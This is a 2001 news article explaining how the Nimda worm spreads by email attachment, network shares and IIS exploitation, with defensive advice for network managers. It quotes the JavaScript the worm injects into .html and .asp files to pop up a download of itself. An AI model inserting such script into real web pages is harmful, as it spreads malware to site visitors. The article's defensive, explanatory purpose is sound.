Nimda Worm Poses a Triple Threat

By Jim Freund | Sep 19, 2001 | Print this Page
http://www.enterprisenetworkingplanet.com/netsecur/article.php/887671/Nimda-Worm-Poses-a-Triple-Threat.htm

Once again, a nasty worm is spreading itself around, and this time it's a particularly insidious one. The worm is called Nimda, which is Admin spelled backwards. The reason this nasty bit of code is noteworthy is not because it's innovative, but due to the fact that it uses three ways to propagate itself. Symantec's Senior Director of Security Response, Sharon Ruchman, terms Nimda a "triple threat" due to this method of blended delivery techniques.

The first is the one that has become most common in recent times -- mass mailing. An e-mail message will show up in a mailbox; usually with a garbled subject line and no text. There will be an attachment which looks like a .WAV file, but in fact links to an executable called "readme.exe". Nimda will attempt to exploit the usual Outlook vulnerabilities. These entail instances where the default options allow the software to launch attached files without user interaction. (Always a bad idea.) Thus, even previewing the message can trigger the worm. Assuming you have been updating Outlook with the security patches and checking the settings, this should not be a problem so long as your users have been advised about all kinds of attachments and are conscientious.

As with Melissa, the worm, once run, can send messages to every sender currently in your In Box and/or address book, as well as reply to the sender of the virused message itself.

The second method of propagation is the one network managers should be particularly aware of. Should you be using Network Share as a form of peer-to-peer workgroup connectivity, without any human interaction, Nimda will exploit that and begin writing a file called "README.EML". If a directory is found with either .html or .asp files, it will append JavaScript code as follows:

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></pre>
This will cause a popup browser window to open and offer Nimda as a download.

The third delivery method is Web-based. Like the Code Red Worm of a few months ago, Nimda sends its code over Port 80 as a HTTP request, attempts to copy itself to unpatched Microsoft IIS web servers, which in turn will allow the worm to run on those machines.

The consequences of being struck by Nimda are nasty and annoying, but not particularly destructive. Outside of the obvious fact that your security has been compromised, the greatest annoyances will be the potential flooding of your e-mail gateways and the DoS. Once the virus has been eradicated, these will go away. If your intranet or Internet pages use standard page formats, they may be compromised with the code mentioned above.

Removing Nimda is not in and of itself difficult -- you just have to be thorough. By this time, several vendors, including Symantec/Norton, have posted a virus definition update which will detect the malicious code and eradicate it. Network managers need to be aware of which machines have had network sharing turned on, and assure that others have not had their settings altered. Ruchman suggests that of you know that the infection was limited to a few machines that you simply rebuild them from scratch.

As mentioned, each of these delivery methods have been used before, but what makes Nimda so potentially dangerous is this blended form of attack. Symantec's Ruchman advises that any network managers who have armed themselves with the latest virus definitions and the most current vulnerability management tools ready to be deployed, should be able to take care of the individual threats that this blended approach of delivery entails. Of course if you have set up firewalls, filtering at the gateway level and basic intrusion detection systems, the likelihood is that you shan't be struck at all.

An Ounce of Prevention
As is always the case, taking precautions before trouble strikes is always your best protection. Make sure that you are using the latest patches and updates for your servers, gateways, e-mail clients, and security-related software. Use a firewall and/or filters to assess incoming mail attachments. Be sure to educate your users about attachments and executables, and don't forget to mention that many files can be suspect no matter what their filename extension may be or what icon is displayed.

Don't allow software defaults to rule your decisions. *Never* allow e-mail clients or browsers launch executables automatically. Be certain you know which computers on your network have Network Share turned on, or any kind of peer-to-peer capabilities enabled.

Here are some patches and software you need to be aware of:
(updated 9/20/01)

--
Jim Freund is the Managing Editor of CrossNodes.